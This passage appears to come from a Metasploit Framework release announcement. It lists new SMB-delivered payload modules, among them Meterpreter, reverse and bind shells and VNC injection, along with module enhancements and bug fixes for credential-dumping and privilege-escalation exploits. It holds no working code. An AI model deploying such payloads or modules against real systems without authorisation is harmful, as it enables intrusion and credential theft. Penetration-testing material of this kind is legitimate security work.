• cmd/windows/smb/x64/meterpreter/bind_named_pipe
• cmd/windows/smb/x64/meterpreter/bind_tcp
• cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
• cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
• cmd/windows/smb/x64/meterpreter/reverse_http
• cmd/windows/smb/x64/meterpreter/reverse_https
• cmd/windows/smb/x64/meterpreter/reverse_named_pipe
• cmd/windows/smb/x64/meterpreter/reverse_tcp
• cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
• cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
• cmd/windows/smb/x64/meterpreter/reverse_winhttp
• cmd/windows/smb/x64/meterpreter/reverse_winhttps
• cmd/windows/smb/x64/meterpreter_bind_named_pipe
• cmd/windows/smb/x64/meterpreter_bind_tcp
• cmd/windows/smb/x64/meterpreter_reverse_http
• cmd/windows/smb/x64/meterpreter_reverse_https
• cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
• cmd/windows/smb/x64/meterpreter_reverse_tcp
• cmd/windows/smb/x64/peinject/bind_ipv6_tcp
• cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/peinject/bind_named_pipe
• cmd/windows/smb/x64/peinject/bind_tcp
• cmd/windows/smb/x64/peinject/bind_tcp_rc4
• cmd/windows/smb/x64/peinject/bind_tcp_uuid
• cmd/windows/smb/x64/peinject/reverse_named_pipe
• cmd/windows/smb/x64/peinject/reverse_tcp
• cmd/windows/smb/x64/peinject/reverse_tcp_rc4
• cmd/windows/smb/x64/peinject/reverse_tcp_uuid
• cmd/windows/smb/x64/pingback_reverse_tcp
• cmd/windows/smb/x64/powershell_bind_tcp
• cmd/windows/smb/x64/powershell_reverse_tcp
• cmd/windows/smb/x64/powershell_reverse_tcp_ssl
• cmd/windows/smb/x64/shell/bind_ipv6_tcp
• cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/shell/bind_named_pipe
• cmd/windows/smb/x64/shell/bind_tcp
• cmd/windows/smb/x64/shell/bind_tcp_rc4
• cmd/windows/smb/x64/shell/bind_tcp_uuid
• cmd/windows/smb/x64/shell/reverse_tcp
• cmd/windows/smb/x64/shell/reverse_tcp_rc4
• cmd/windows/smb/x64/shell/reverse_tcp_uuid
• cmd/windows/smb/x64/shell_bind_tcp
• cmd/windows/smb/x64/shell_reverse_tcp
• cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
• cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/vncinject/bind_named_pipe
• cmd/windows/smb/x64/vncinject/bind_tcp
• cmd/windows/smb/x64/vncinject/bind_tcp_rc4
• cmd/windows/smb/x64/vncinject/bind_tcp_uuid
• cmd/windows/smb/x64/vncinject/reverse_http
• cmd/windows/smb/x64/vncinject/reverse_https
• cmd/windows/smb/x64/vncinject/reverse_tcp
• cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
• cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
• cmd/windows/smb/x64/vncinject/reverse_winhttp
• cmd/windows/smb/x64/vncinject/reverse_winhttps

Enhancements and features (7)

• #18706 from sjanusz-r7 - Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is behind a feature flag which can be enabled with features set postgres_session_type true.
• #18747 from zgoldman-r7 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
• #18759 from cgranleese-r7 - Updates the multiple MySQL modules to work with a provided MySQL session instead of opening a new connection. This functionality is behind a feature flag which can be enabled with features set mysql_session_type true.
• #18763 from zgoldman-r7 - Updates multiple MSSQL modules to now work with the new MSSQL session type that is enabled with features set mssql_session_type true.
• #18806 from cgranleese-r7 - Improves unknown command handling by suggesting similar valid commands.
• #18809 from zeroSteiner - Makes multiple improvements to the dns command - a new command which mimics the functionality of /etc/resolv.conf and /etc/hosts. This functionality is currently behind a feature flag which can be enabled with features set dns_feature true in msfconsole.
• #18825 from cgranleese-r7 - Improves the error messages when the current session is not compatible with a post module.

Bugs fixed (13)

• #18616 from adfoster-r7 - This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.
• #18774 from adfoster-r7 - Updates the following modules to now work with newer versions of sqlcmd:
  post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
• #18786 from lihe07 - This fixes an option name collision between the exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.
• #18795 from cgranleese-r7 - Moves the CreateSession option from advanced into basic options for modules, in order to increase discoverability.
• #18798 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module's check method that was causing version comparisons to fail.
• #18799 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_17136 module's check method that was causing version comparisons to fail.
• #18800 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2021_40449 module's check method that was causing version comparisons to fail.
• #18801 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module's check method that was causing version comparisons to fail.
• #18812 from adfoster-r7 - Reverts the auxiliary/scanner/mssql/mssql_login modules's TDSENCRYPTION default value to false.
• #18813 from adfoster-r7 - Fixes a crash when running the help services or help hosts commands.
• #18823 from cdelafuente-r7 - Fix module metadata platform list comparison.
• #18826 from dwelch-r7 - Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
• #18828 from dwelch-r7 - Fixes a crash when exploit modules used nops.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.55...6.3.56
• Full diff 6.3.55...6.3.56

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro